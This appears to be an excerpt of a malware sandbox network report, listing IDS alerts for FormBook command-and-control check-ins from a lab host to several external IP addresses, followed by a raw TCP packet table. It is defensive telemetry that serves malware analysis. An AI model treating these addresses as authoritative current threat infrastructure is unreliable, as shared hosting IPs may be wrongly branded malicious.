2025-01-13T10:24:27.870637+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49816	104.21.112.1	80	TCP
2025-01-13T10:24:30.543791+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49817	104.21.112.1	80	TCP
2025-01-13T10:24:33.102008+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49818	104.21.112.1	80	TCP
2025-01-13T10:24:39.569082+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49819	47.83.1.90	80	TCP
2025-01-13T10:24:42.413395+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49820	47.83.1.90	80	TCP
2025-01-13T10:24:45.232871+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49821	47.83.1.90	80	TCP
2025-01-13T10:24:48.097466+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49822	47.83.1.90	80	TCP
2025-01-13T10:24:56.596425+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49823	194.9.94.86	80	TCP
2025-01-13T10:25:01.872669+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49824	45.56.79.23	80	TCP
2025-01-13T10:25:04.528707+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49825	45.56.79.23	80	TCP
2025-01-13T10:25:07.184698+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49826	45.56.79.23	80	TCP
2025-01-13T10:25:09.838208+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49827	45.56.79.23	80	TCP
2025-01-13T10:25:15.532314+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49828	104.21.16.1	80	TCP
2025-01-13T10:25:18.147768+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49829	104.21.16.1	80	TCP
2025-01-13T10:25:20.776827+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49830	104.21.16.1	80	TCP
2025-01-13T10:25:23.381614+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49831	104.21.16.1	80	TCP
2025-01-13T10:25:28.747758+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49832	199.192.21.169	80	TCP
2025-01-13T10:25:31.442283+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49833	199.192.21.169	80	TCP
2025-01-13T10:25:34.145976+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49834	199.192.21.169	80	TCP
2025-01-13T10:25:36.827596+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49835	199.192.21.169	80	TCP
2025-01-13T10:25:51.371208+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49836	47.83.1.90	80	TCP
2025-01-13T10:25:54.199057+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49837	47.83.1.90	80	TCP
2025-01-13T10:25:57.044951+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49838	47.83.1.90	80	TCP
2025-01-13T10:25:59.940054+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49839	47.83.1.90	80	TCP
2025-01-13T10:26:06.170167+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49840	13.248.169.48	80	TCP
2025-01-13T10:26:08.802085+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49841	13.248.169.48	80	TCP
2025-01-13T10:26:11.425403+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49842	13.248.169.48	80	TCP
2025-01-13T10:26:14.065763+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49843	13.248.169.48	80	TCP
2025-01-13T10:26:19.804116+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49844	160.25.166.123	80	TCP
2025-01-13T10:26:22.686466+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49845	160.25.166.123	80	TCP
2025-01-13T10:26:25.566976+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49846	160.25.166.123	80	TCP
2025-01-13T10:26:28.457325+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49847	160.25.166.123	80	TCP
2025-01-13T10:26:33.689700+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49848	172.67.132.227	80	TCP
2025-01-13T10:26:36.317142+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49849	172.67.132.227	80	TCP
2025-01-13T10:26:38.938644+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49850	172.67.132.227	80	TCP
2025-01-13T10:26:41.561139+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49851	172.67.132.227	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 10:21:10.361018896 CET	49770	80	192.168.11.20	194.9.94.86
Jan 13, 2025 10:21:10.569643021 CET	80	49770	194.9.94.86	192.168.11.20
Jan 13, 2025 10:21:10.569932938 CET	49770	80	192.168.11.20	194.9.94.86
Jan 13, 2025 10:21:10.572426081 CET	49770	80	192.168.11.20	194.9.94.86
Jan 13, 2025 10:21:10.778404951 CET	80	49770	194.9.94.86	192.168.11.20
Jan 13, 2025 10:21:10.784209967 CET	80	49770	194.9.94.86	192.168.11.20
Jan 13, 2025 10:21:10.784317970 CET	80	49770	194.9.94.86	192.168.11.20
Jan 13, 2025 10:21:10.784456015 CET	80	49770	194.9.94.86	192.168.11.20
Jan 13, 2025 10:21:10.784518003 CET	49770	80	192.168.11.20	194.9.94.86
Jan 13, 2025 10:21:10.784585953 CET	80	49770	194.9.94.86	192.168.11.20
Jan 13, 2025 10:21:10.784688950 CET	80	49770	194.9.94.86	192.168.11.20
Jan 13, 2025 10:21:10.784699917 CET	80	49770	194.9.94.86	192.168.11.20
Jan 13, 2025 10:21:10.784920931 CET	49770	80	192.168.11.20	194.9.94.86
Jan 13, 2025 10:21:10.785187960 CET	49770	80	192.168.11.20	194.9.94.86
Jan 13, 2025 10:21:10.785851955 CET	49770	80	192.168.11.20	194.9.94.86
Jan 13, 2025 10:21:10.994360924 CET	80	49770	194.9.94.86	192.168.11.20
Jan 13, 2025 10:21:26.020929098 CET	49771	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:21:26.152311087 CET	80	49771	45.56.79.23	192.168.11.20
Jan 13, 2025 10:21:26.152542114 CET	49771	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:21:26.156018019 CET	49771	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:21:26.293402910 CET	80	49771	45.56.79.23	192.168.11.20
Jan 13, 2025 10:21:26.293421030 CET	80	49771	45.56.79.23	192.168.11.20
Jan 13, 2025 10:21:26.293639898 CET	49771	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:21:27.665255070 CET	49771	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:21:28.681658030 CET	49772	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:21:28.812823057 CET	80	49772	45.56.79.23	192.168.11.20
Jan 13, 2025 10:21:28.813150883 CET	49772	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:21:28.816634893 CET	49772	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:21:28.950093985 CET	80	49772	45.56.79.23	192.168.11.20
Jan 13, 2025 10:21:28.950114012 CET	80	49772	45.56.79.23	192.168.11.20
Jan 13, 2025 10:21:28.950306892 CET	49772	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:21:30.320990086 CET	49772	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:21:31.337222099 CET	49773	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:21:31.468636036 CET	80	49773	45.56.79.23	192.168.11.20
Jan 13, 2025 10:21:31.468861103 CET	49773	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:21:31.472362041 CET	49773	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:21:31.472429991 CET	49773	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:21:31.603918076 CET	80	49773	45.56.79.23	192.168.11.20
Jan 13, 2025 10:21:31.603965998 CET	80	49773	45.56.79.23	192.168.11.20
Jan 13, 2025 10:21:31.603993893 CET	80	49773	45.56.79.23	192.168.11.20
Jan 13, 2025 10:21:31.604353905 CET	80	49773	45.56.79.23	192.168.11.20
Jan 13, 2025 10:21:31.604394913 CET	80	49773	45.56.79.23	192.168.11.20
Jan 13, 2025 10:21:31.604649067 CET	80	49773	45.56.79.23	192.168.11.20
Jan 13, 2025 10:21:31.607458115 CET	80	49773	45.56.79.23	192.168.11.20
Jan 13, 2025 10:21:31.607517004 CET	80	49773	45.56.79.23	192.168.11.20
Jan 13, 2025 10:21:31.607687950 CET	49773	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:21:32.976519108 CET	49773	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:21:33.992778063 CET	49774	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:21:34.123856068 CET	80	49774	45.56.79.23	192.168.11.20
Jan 13, 2025 10:21:34.124135971 CET	49774	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:21:34.126534939 CET	49774	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:21:34.260377884 CET	80	49774	45.56.79.23	192.168.11.20
Jan 13, 2025 10:21:34.260425091 CET	80	49774	45.56.79.23	192.168.11.20
Jan 13, 2025 10:21:34.260462999 CET	80	49774	45.56.79.23	192.168.11.20
Jan 13, 2025 10:21:34.260732889 CET	49774	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:21:34.260732889 CET	49774	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:21:34.261383057 CET	49774	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:21:34.392436981 CET	80	49774	45.56.79.23	192.168.11.20
Jan 13, 2025 10:21:39.914016008 CET	49775	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:40.014183044 CET	80	49775	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:40.014533997 CET	49775	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:40.018374920 CET	49775	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:40.118489027 CET	80	49775	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:40.593661070 CET	80	49775	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:40.593681097 CET	80	49775	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:40.593803883 CET	80	49775	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:40.593847990 CET	49775	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:40.593926907 CET	49775	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:41.521616936 CET	49775	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:42.537748098 CET	49776	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:42.637921095 CET	80	49776	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:42.638199091 CET	49776	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:42.641793013 CET	49776	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:42.741996050 CET	80	49776	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:43.225615025 CET	80	49776	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:43.225682974 CET	80	49776	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:43.225723982 CET	80	49776	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:43.225878000 CET	49776	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:43.225878000 CET	49776	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:44.146008015 CET	49776	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:45.162153959 CET	49777	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:45.262299061 CET	80	49777	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:45.262590885 CET	49777	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:45.266153097 CET	49777	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:45.266256094 CET	49777	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:45.366288900 CET	80	49777	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:45.366475105 CET	80	49777	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:45.366524935 CET	80	49777	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:45.366739988 CET	80	49777	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:45.366894960 CET	80	49777	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:45.367214918 CET	80	49777	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:45.367254019 CET	80	49777	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:45.844710112 CET	80	49777	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:45.844770908 CET	80	49777	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:45.844813108 CET	80	49777	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:45.844949961 CET	49777	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:45.845114946 CET	49777	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:46.770426989 CET	49777	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:47.786546946 CET	49778	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:47.886471987 CET	80	49778	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:47.886701107 CET	49778	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:47.889254093 CET	49778	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:47.989131927 CET	80	49778	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:48.457315922 CET	80	49778	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:48.457370996 CET	80	49778	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:48.457412004 CET	80	49778	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:48.457447052 CET	80	49778	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:48.457776070 CET	49778	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:48.458713055 CET	49778	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:21:48.558625937 CET	80	49778	104.21.16.1	192.168.11.20
Jan 13, 2025 10:21:53.581022978 CET	49779	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:21:53.745606899 CET	80	49779	199.192.21.169	192.168.11.20
Jan 13, 2025 10:21:53.745807886 CET	49779	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:21:53.749260902 CET	49779	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:21:53.913901091 CET	80	49779	199.192.21.169	192.168.11.20
Jan 13, 2025 10:21:53.930924892 CET	80	49779	199.192.21.169	192.168.11.20
Jan 13, 2025 10:21:53.930974960 CET	80	49779	199.192.21.169	192.168.11.20
Jan 13, 2025 10:21:53.931272984 CET	49779	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:21:55.253047943 CET	49779	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:21:56.269103050 CET	49780	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:21:56.433140993 CET	80	49780	199.192.21.169	192.168.11.20
Jan 13, 2025 10:21:56.433420897 CET	49780	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:21:56.437421083 CET	49780	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:21:56.600915909 CET	80	49780	199.192.21.169	192.168.11.20
Jan 13, 2025 10:21:56.614742994 CET	80	49780	199.192.21.169	192.168.11.20
Jan 13, 2025 10:21:56.614789009 CET	80	49780	199.192.21.169	192.168.11.20
Jan 13, 2025 10:21:56.615000963 CET	49780	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:21:57.939954042 CET	49780	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:21:58.956083059 CET	49781	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:21:59.120745897 CET	80	49781	199.192.21.169	192.168.11.20
Jan 13, 2025 10:21:59.121025085 CET	49781	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:21:59.124716997 CET	49781	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:21:59.290196896 CET	80	49781	199.192.21.169	192.168.11.20
Jan 13, 2025 10:21:59.290275097 CET	80	49781	199.192.21.169	192.168.11.20
Jan 13, 2025 10:21:59.290304899 CET	80	49781	199.192.21.169	192.168.11.20
Jan 13, 2025 10:21:59.290574074 CET	80	49781	199.192.21.169	192.168.11.20
Jan 13, 2025 10:21:59.290611982 CET	80	49781	199.192.21.169	192.168.11.20
Jan 13, 2025 10:21:59.290640116 CET	80	49781	199.192.21.169	192.168.11.20
Jan 13, 2025 10:21:59.309046984 CET	80	49781	199.192.21.169	192.168.11.20
Jan 13, 2025 10:21:59.309098959 CET	80	49781	199.192.21.169	192.168.11.20
Jan 13, 2025 10:21:59.309282064 CET	49781	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:22:00.626805067 CET	49781	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:22:01.643021107 CET	49782	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:22:01.807991982 CET	80	49782	199.192.21.169	192.168.11.20
Jan 13, 2025 10:22:01.808383942 CET	49782	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:22:01.810759068 CET	49782	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:22:01.975239992 CET	80	49782	199.192.21.169	192.168.11.20
Jan 13, 2025 10:22:01.991018057 CET	80	49782	199.192.21.169	192.168.11.20
Jan 13, 2025 10:22:01.991069078 CET	80	49782	199.192.21.169	192.168.11.20
Jan 13, 2025 10:22:01.991542101 CET	49782	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:22:01.992167950 CET	49782	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:22:02.156697989 CET	80	49782	199.192.21.169	192.168.11.20
Jan 13, 2025 10:22:15.540545940 CET	49783	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:22:15.862505913 CET	80	49783	47.83.1.90	192.168.11.20
Jan 13, 2025 10:22:15.862674952 CET	49783	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:22:15.866168976 CET	49783	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:22:16.188086033 CET	80	49783	47.83.1.90	192.168.11.20
Jan 13, 2025 10:22:16.862235069 CET	80	49783	47.83.1.90	192.168.11.20
Jan 13, 2025 10:22:16.862307072 CET	80	49783	47.83.1.90	192.168.11.20
Jan 13, 2025 10:22:16.862550974 CET	49783	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:22:17.373156071 CET	49783	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:22:18.389456034 CET	49784	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:22:18.706850052 CET	80	49784	47.83.1.90	192.168.11.20
Jan 13, 2025 10:22:18.707048893 CET	49784	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:22:18.710575104 CET	49784	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:22:19.028804064 CET	80	49784	47.83.1.90	192.168.11.20
Jan 13, 2025 10:22:19.704684973 CET	80	49784	47.83.1.90	192.168.11.20
Jan 13, 2025 10:22:19.704878092 CET	80	49784	47.83.1.90	192.168.11.20
Jan 13, 2025 10:22:19.705027103 CET	49784	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:22:20.216299057 CET	49784	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:22:21.232578993 CET	49785	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:22:21.555335045 CET	80	49785	47.83.1.90	192.168.11.20
Jan 13, 2025 10:22:21.555510044 CET	49785	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:22:21.559335947 CET	49785	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:22:21.559434891 CET	49785	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:22:21.881556034 CET	80	49785	47.83.1.90	192.168.11.20
Jan 13, 2025 10:22:21.881906986 CET	80	49785	47.83.1.90	192.168.11.20
Jan 13, 2025 10:22:21.881949902 CET	80	49785	47.83.1.90	192.168.11.20
Jan 13, 2025 10:22:21.882313967 CET	80	49785	47.83.1.90	192.168.11.20
Jan 13, 2025 10:22:21.882358074 CET	80	49785	47.83.1.90	192.168.11.20
Jan 13, 2025 10:22:21.882386923 CET	80	49785	47.83.1.90	192.168.11.20
Jan 13, 2025 10:22:21.883116961 CET	80	49785	47.83.1.90	192.168.11.20
Jan 13, 2025 10:22:22.561311007 CET	80	49785	47.83.1.90	192.168.11.20
Jan 13, 2025 10:22:22.561357021 CET	80	49785	47.83.1.90	192.168.11.20
Jan 13, 2025 10:22:22.561506987 CET	49785	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:22:23.075010061 CET	49785	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:22:24.091183901 CET	49786	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:22:24.408931971 CET	80	49786	47.83.1.90	192.168.11.20
Jan 13, 2025 10:22:24.409146070 CET	49786	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:22:24.411524057 CET	49786	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:22:24.729044914 CET	80	49786	47.83.1.90	192.168.11.20
Jan 13, 2025 10:22:25.411010027 CET	80	49786	47.83.1.90	192.168.11.20
Jan 13, 2025 10:22:25.411057949 CET	80	49786	47.83.1.90	192.168.11.20
Jan 13, 2025 10:22:25.411304951 CET	49786	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:22:25.411962986 CET	49786	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:22:25.729410887 CET	80	49786	47.83.1.90	192.168.11.20
Jan 13, 2025 10:22:30.527581930 CET	49787	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:22:31.541289091 CET	49787	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:22:31.643872023 CET	80	49787	13.248.169.48	192.168.11.20
Jan 13, 2025 10:22:31.643996954 CET	49787	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:22:31.647571087 CET	49787	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:22:31.749876976 CET	80	49787	13.248.169.48	192.168.11.20
Jan 13, 2025 10:22:31.749887943 CET	80	49787	13.248.169.48	192.168.11.20
Jan 13, 2025 10:22:31.750087023 CET	49787	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:22:33.150985003 CET	49787	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:22:34.167052031 CET	49788	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:22:34.271361113 CET	80	49788	13.248.169.48	192.168.11.20
Jan 13, 2025 10:22:34.271574020 CET	49788	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:22:34.275103092 CET	49788	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:22:34.379445076 CET	80	49788	13.248.169.48	192.168.11.20
Jan 13, 2025 10:22:34.379657984 CET	80	49788	13.248.169.48	192.168.11.20
Jan 13, 2025 10:22:34.379786968 CET	49788	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:22:35.791074038 CET	49788	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:22:36.807183981 CET	49789	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:22:36.910048962 CET	80	49789	13.248.169.48	192.168.11.20
Jan 13, 2025 10:22:36.910204887 CET	49789	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:22:36.913814068 CET	49789	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:22:36.913863897 CET	49789	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:22:36.913909912 CET	49789	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:22:37.015722990 CET	80	49789	13.248.169.48	192.168.11.20
Jan 13, 2025 10:22:37.015867949 CET	80	49789	13.248.169.48	192.168.11.20
Jan 13, 2025 10:22:37.016379118 CET	80	49789	13.248.169.48	192.168.11.20
Jan 13, 2025 10:22:37.016618967 CET	80	49789	13.248.169.48	192.168.11.20
Jan 13, 2025 10:22:37.016801119 CET	49789	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:22:38.415472984 CET	49789	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:22:39.431634903 CET	49790	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:22:39.534581900 CET	80	49790	13.248.169.48	192.168.11.20
Jan 13, 2025 10:22:39.534791946 CET	49790	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:22:39.537175894 CET	49790	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:22:39.642132044 CET	80	49790	13.248.169.48	192.168.11.20
Jan 13, 2025 10:22:39.642147064 CET	80	49790	13.248.169.48	192.168.11.20
Jan 13, 2025 10:22:39.642391920 CET	49790	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:22:39.643070936 CET	49790	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:22:39.744153023 CET	80	49790	13.248.169.48	192.168.11.20
Jan 13, 2025 10:22:45.405030012 CET	49791	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:22:45.759308100 CET	80	49791	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:45.759593964 CET	49791	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:22:45.763309956 CET	49791	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:22:46.116802931 CET	80	49791	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:46.117784977 CET	80	49791	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:46.117808104 CET	80	49791	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:46.117825985 CET	80	49791	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:46.117945910 CET	49791	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:22:47.272931099 CET	49791	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:22:48.289103985 CET	49792	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:22:48.635714054 CET	80	49792	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:48.635965109 CET	49792	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:22:48.639453888 CET	49792	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:22:48.985480070 CET	80	49792	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:48.986412048 CET	80	49792	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:48.986450911 CET	80	49792	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:48.986478090 CET	80	49792	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:48.986718893 CET	49792	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:22:50.147505045 CET	49792	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:22:51.163564920 CET	49793	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:22:51.521256924 CET	80	49793	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:51.521378040 CET	49793	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:22:51.524970055 CET	49793	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:22:51.525008917 CET	49793	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:22:51.879887104 CET	80	49793	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:51.879906893 CET	80	49793	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:51.879972935 CET	80	49793	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:51.880258083 CET	80	49793	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:51.882846117 CET	80	49793	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:51.882880926 CET	80	49793	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:51.882895947 CET	80	49793	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:51.882909060 CET	80	49793	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:51.882921934 CET	80	49793	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:51.882932901 CET	80	49793	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:51.882945061 CET	80	49793	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:54.053425074 CET	49794	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:22:54.413507938 CET	80	49794	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:54.413726091 CET	49794	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:22:54.416122913 CET	49794	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:22:54.775114059 CET	80	49794	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:54.775917053 CET	80	49794	160.25.166.123	192.168.11.20
